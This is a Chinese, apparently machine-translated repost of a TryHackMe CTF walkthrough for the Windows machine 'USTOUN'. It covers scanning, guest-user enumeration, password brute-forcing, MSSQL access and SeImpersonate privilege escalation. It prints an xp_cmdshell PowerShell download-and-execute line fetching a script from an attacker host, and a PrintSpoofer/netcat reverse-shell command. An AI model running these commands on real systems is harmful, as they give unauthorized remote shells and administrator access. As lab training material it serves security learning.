首页 > 其他分享 >USTOUN TryHackMe 撰写/演练

USTOUN TryHackMe 撰写/演练

时间:2022-09-22 12:33:08浏览次数:97  
标签:标志 用户 演练 USTOUN 我们 TryHackMe

USTOUN TryHackMe 撰写/演练

USTOUN TryHackMe 文章

级别:中 |操作系统:Windows

这是一篇关于 乌斯顿 试试HackMe 机器。

扫描

我们执行快速而积极的扫描( 不建议在真实环境中使用 ) 来检测服务器上的开放端口。

然后,知道端口后,我们将启动一个带有脚本和版本的 nmap。

枚举

我们测试我们是否可以使用匿名用户进行身份验证,我们发现我们不能。

我通常在真实环境中进行的另一项测试是使用 “来宾” 用户,通常默认启用。正如您在证据中看到的,我们可以使用它来获取用户 RID .

我们创建了一个获得的最相关用户的列表并蛮力 “摇滚你” 字典。我们将获得一些凭据。

开发

在不同服务中进行多次测试后,我们发现凭证在 “微软 SQL 服务器” 服务,从这里我们将能够加载反向shell。

xp_cmdshell powershell IEX(New-Object Net.webclient) .downloadString (\”http://10.11.30.149:8000/m3.ps1\”)

反壳连接

权限提升

我们试图读取用户标志,但我们无权访问。我们检查用户的权限,发现我们可以通过冒充用户来升级 “行政人员” 使用 “自我模拟特权” .

我们确定安装的 Windows 的确切版本。

我们下载 打印欺骗器 从中利用 github ,我们也下载 网猫 到受害者机器并运行以下命令进行监听 网猫 在我们的卡利。

.\PrintSpoofer.exe -c “C:\users\SVC-Kerb.DC01\Videos\nc.exe 10.11.30.149 444 -e cmd”

以管理员身份反转 shell

现在我们读取了这两个标志。

用户标志

管理员标志

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明

本文链接:https://www.qanswer.top/38684/23312212

标签:标志,用户,演练,USTOUN,我们,TryHackMe
From: https://www.cnblogs.com/amboke/p/16718823.html

相关文章